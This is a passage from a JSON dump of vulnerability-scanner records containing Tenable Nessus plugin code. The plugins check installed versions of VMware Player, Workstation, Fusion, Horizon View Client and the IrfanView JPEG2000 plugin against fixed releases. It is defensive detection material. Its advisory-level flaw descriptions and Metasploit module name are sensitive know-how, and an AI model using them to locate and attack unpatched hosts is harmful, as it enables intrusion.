vulnerabilities exist due\n to improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to execute arbitrary code. (CVE-2015-2336,\n CVE-2015-2337)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Horizon View Client 3.2.1 / 3.4.0 / 5.4.2 (with\nlocal mode) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:horizon_view_client\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_horizon_view_client_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Horizon View Client\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Horizon View Client';\n\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\nversion = install[\"version\"];\npath = install[\"path\"];\nlocal_mode = install[\"Local Mode\"];\n\nif (local_mode == \"yes\")\n appname += \" (with local mode)\";\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nif (version =~ \"^3\\.2(\\.|$)\")\n fix = \"3.2.1\";\nelse if (version =~ \"^3\\.3(\\.|$)\")\n fix = \"3.4.0\";\nelse if (version =~ \"^5(\\.|$)\" && local_mode == \"yes\")\n fix = \"5.4.2\";\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Product : ' + appname +\n '\\n Path : ' + path +\n '\\n Installed version : ' + version+\n '\\n Fixed version : ' + fix + '\\n';\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n\nif (report_verbosity > 0) security_warning(port:port, extra:report);\nelse security_warning(port);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware Player installed on the remote Windows host is\n7.x prior to 7.1.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)", "edition": 25, "published": "2015-06-16T00:00:00", "title": "VMware Player 7.x < 7.1.1 Multiple Vulnerabilities (VMSA-2015-0004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_7_1_1_VMSA_2015-0004.NASL", "href": "https://www.tenable.com/plugins/nessus/84220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84220);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2012-0897\",\n \"CVE-2015-2336\",\n \"CVE-2015-2337\",\n \"CVE-2015-2338\",\n \"CVE-2015-2339\",\n \"CVE-2015-2340\"\n );\n script_bugtraq_id(51426, 75092, 75095);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Player 7.x < 7.1.1 Multiple Vulnerabilities (VMSA-2015-0004)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote Windows host is\n7.x prior to 7.1.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Player version 7.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_player_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"VMware/Player/Path\", \"VMware/Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nversion = get_kb_item_or_exit(\"VMware/Player/Version\");\npath = get_kb_item_or_exit(\"VMware/Player/Path\");\n\nfixed = '7.1.1';\nif (\n version =~ \"^7\\.\" &&\n ver_compare(ver:version, fix:fixed, strict:FALSE) == -1\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Player\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:23", "description": "The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.6 or 11.x prior to 11.1.1. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)", "edition": 25, "published": "2015-06-16T00:00:00", "title": "VMware Workstation 10.x < 10.0.6 / 11.x < 11.1.1 Multiple Vulnerabilities (VMSA-2015-0004) (Windows)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_MULTIPLE_VMSA_2015_0004.NASL", "href": "https://www.tenable.com/plugins/nessus/84223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84223);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2012-0897\",\n \"CVE-2015-2336\",\n \"CVE-2015-2337\",\n \"CVE-2015-2338\",\n \"CVE-2015-2339\",\n \"CVE-2015-2340\"\n );\n script_bugtraq_id(51426, 75092, 75095);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Workstation 10.x < 10.0.6 / 11.x < 11.1.1 Multiple Vulnerabilities (VMSA-2015-0004) (Windows)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.6 or 11.x prior to 11.1.1. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Workstation version 10.0.6 / 11.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"VMware/Workstation/Version\", \"VMware/Workstation/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Workstation';\n\nversion = get_kb_item(\"VMware/Workstation/Version\");\nif (isnull(version)) audit(AUDIT_NOT_INST, appname);\n\npath = get_kb_item_or_exit(\"VMware/Workstation/Path\");\n\nfix = NULL;\nif (version =~ \"^10\\.\" && ver_compare(ver:version, fix:\"10.0.6\", strict:FALSE) == -1)\n fix = \"10.0.6\";\nelse if (version =~ \"^11\\.\" && ver_compare(ver:version, fix:\"11.1.1\", strict:FALSE) == -1)\n fix = \"11.1.1\";\n\nif(fix)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity >0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T10:55:14", "description": "The version of VMware Workstation installed on the remote Linux host\nis 10.x prior to 10.0.6. It is, therefore, affected by a denial of\nservice vulnerability due to improper validation of user-supplied\ninput to a remote procedure call (RPC) command. An unauthenticated,\nremote attacker can exploit this, via a crafted command, to crash the\nhost or guest operating systems.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2015-06-16T00:00:00", "title": "VMware Workstation 10.x < 10.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "modified": "2015-06-16T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_LINUX_10_0_6.NASL", "href": "https://www.tenable.com/plugins/nessus/84222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84222);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/21\");\n\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Workstation 10.x < 10.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote Linux host\nis 10.x prior to 10.0.6. It is, therefore, affected by a denial of\nservice vulnerability due to improper validation of user-supplied\ninput to a remote procedure call (RPC) command. An unauthenticated,\nremote attacker can exploit this, via a crafted command, to crash the\nhost or guest operating systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Workstation version 10.0.6 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2341\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.\");\n script_family(english:\"General\");\n\n script_dependencies(\"vmware_workstation_linux_installed.nbin\");\n script_require_keys(\"Host/uname\", \"Host/VMware Workstation/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (\"linux\" >!< tolower(get_kb_item(\"Host/uname\")))\n audit(AUDIT_OS_NOT, \"Linux\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Workstation/Version\");\n\nfixed = \"10.0.6\";\nif (version =~ \"^10\\.\" && ver_compare(ver:version, fix:fixed, strict:FALSE) == -1)\n{\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Workstation\", version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T03:30:03", "description": "The version of VMware Fusion installed on the remote Mac OS X host is\nversion 6.x prior to 6.0.6 or 7.x prior to 7.0.1. It is, therefore,\naffected by a denial of service vulnerability due to improper\nvalidation of user-supplied input to a remote procedure call (RPC)\ncommand. An unauthenticated, remote attacker can exploit this, via a\ncrafted command, to crash the host or guest operating systems.", "edition": 24, "published": "2015-06-16T00:00:00", "title": "VMware Fusion 6.x < 6.0.6 / 7.x < 7.0.1 RPC Command DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:fusion"], "id": "MACOSX_FUSION_7_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/84218", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84218);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Fusion 6.x < 6.0.6 / 7.x < 7.0.1 RPC Command DoS\");\n script_summary(english:\"Checks the VMware Fusion version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A VMware product installed on the remote host is affected by a denial\nof service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Fusion installed on the remote Mac OS X host is\nversion 6.x prior to 6.0.6 or 7.x prior to 7.0.1. It is, therefore,\naffected by a denial of service vulnerability due to improper\nvalidation of user-supplied input to a remote procedure call (RPC)\ncommand. An unauthenticated, remote attacker can exploit this, via a\ncrafted command, to crash the host or guest operating systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Fusion version 6.0.6 / 7.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:fusion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_fusion_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"MacOSX/Fusion/Version\", \"MacOSX/Fusion/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Fusion/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Fusion/Path\");\n\nfix = NULL;\nif (version =~ \"^6\\.\" && ver_compare(ver:version, fix:\"6.0.6\", strict:FALSE) == -1)\n fix = '6.0.6';\n\nelse if (version =~ \"^7\\.\" && ver_compare(ver:version, fix:\"7.0.1\", strict:FALSE) == -1)\n fix = '7.0.1';\n\nif(fix)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Fusion\", version, path);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware Player installed on the remote Linux host is 6.x\nprior to 6.0.6. It is, therefore, affected by a denial of service\nvulnerability due to improper validation of user-supplied input to a\nremote procedure call (RPC) command. An unauthenticated, remote\nattacker can exploit this, via a crafted command, to crash the host or\nguest operating systems.", "edition": 24, "published": "2015-06-16T00:00:00", "title": "VMware Player 6.x < 6.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_LINUX_6_0_6.NASL", "href": "https://www.tenable.com/plugins/nessus/84221", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84221);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\n\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Player 6.x < 6.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote Linux host is 6.x\nprior to 6.0.6. It is, therefore, affected by a denial of service\nvulnerability due to improper validation of user-supplied input to a\nremote procedure call (RPC) command. An unauthenticated, remote\nattacker can exploit this, via a crafted command, to crash the host or\nguest operating systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Player version 6.0.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"General\");\n\n script_dependencies(\"vmware_player_linux_installed.nbin\");\n script_require_keys(\"Host/uname\", \"Host/VMware Player/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (\"linux\" >!< tolower(get_kb_item(\"Host/uname\")))\n audit(AUDIT_OS_NOT, \"Linux\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Player/Version\");\n\nfixed = \"6.0.6\";\nif (version =~ \"^6\\.\" && ver_compare(ver:version, fix:fixed, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Player\", version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T03:16:41", "description": "The version of the IrfanView JPEG-2000 plugin (JPEG2000.dll) was found\nto be less than 4.33. Such versions are affected by a stack-based\nbuffer overflow vulnerability that can be triggered by tricking users\ninto opening a .JP2 file with a specially crafted Quantization Default\nsection. Successful exploitation may allow arbitrary code to be\nexecuted on the affected host subject to the privileges of the user.", "edition": 25, "published": "2012-07-05T00:00:00", "title": "IrfanView JPEG-2000 Plugin Remote Stack-based Buffer Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0897"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:irfanview:irfanview"], "id": "IRFANVIEW_JPEG2000_STACK_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/59846", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59846);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2012-0897\");\n script_bugtraq_id(51426);\n\n script_name(english:\"IrfanView JPEG-2000 Plugin Remote Stack-based Buffer Overflow\");\n script_summary(english:\"Checks version of JPEG2000.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has an application installed that is affected by a \nstack-based buffer overflow vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of the IrfanView JPEG-2000 plugin (JPEG2000.dll) was found\nto be less than 4.33. Such versions are affected by a stack-based\nbuffer overflow vulnerability that can be triggered by tricking users\ninto opening a .JP2 file with a specially crafted Quantization Default\nsection. Successful exploitation may allow arbitrary code to be\nexecuted on the affected host subject to the privileges of the user.\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"https://www.irfanview.com/plugins.htm\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the JPEG-2000 plugin to version 4.3.3.0 (4.33) or higher.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\",value:\"2012/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2012/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2012/07/05\");\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:irfanview:irfanview\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"irfanview_installed.nasl\");\n script_require_keys(\"SMB/IrfanView/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nplugin = \"JPEG2000.dll\";\nfix = 